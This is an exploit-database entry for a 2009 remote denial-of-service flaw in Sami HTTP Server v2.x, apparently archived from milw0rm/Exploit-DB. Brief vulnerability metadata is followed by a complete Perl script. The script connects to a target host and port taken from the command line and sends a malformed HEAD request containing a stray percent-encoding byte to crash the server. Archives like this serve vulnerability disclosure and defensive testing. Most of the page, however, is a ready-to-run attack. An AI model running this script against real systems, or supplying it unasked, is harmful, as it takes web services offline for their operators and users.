Sami HTTP Server v2.x Remote Denial of Service with (HEAD) request

vendor:

HTTP Server

by:

Jonathan Salwan

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: HTTP Server

Affected Version From: v2.x

Affected Version To: v2.x

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Sami HTTP Server v2.x Remote Denial of Service with (HEAD) request

The vulnerability is caused due to an error in handling the HEAD command. This can be exploited to crash the HTTP service.

Mitigation:

N/A

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Sami HTTP Server v2.x Remote Denial of Service with (HEAD) request.
#
# --------------------------------------------------------------------
# The vulnerability is caused due to an error in handling the HEAD
# command. This can be exploited to crash the HTTP service.
# --------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org


use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft   : Sami HTTP Server v2.x Remote DoS\n";

	if (@ARGV < 1)
		{
 		print "[-] Usage: <file.pl> <host> <port>\n";
 		print "[-] Exemple: file.pl 127.0.0.1 80\n";
 		exit;
		}


	$ip 	= $ARGV[0];
	$port 	= $ARGV[1];

print "[+] Sending request...\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Connexion FAILED!\n";

	print $socket "HEAD /\x25 HTTP/1.0\r\n";

close($socket);

print "[+]Done!\n";

# milw0rm.com [2009-03-30]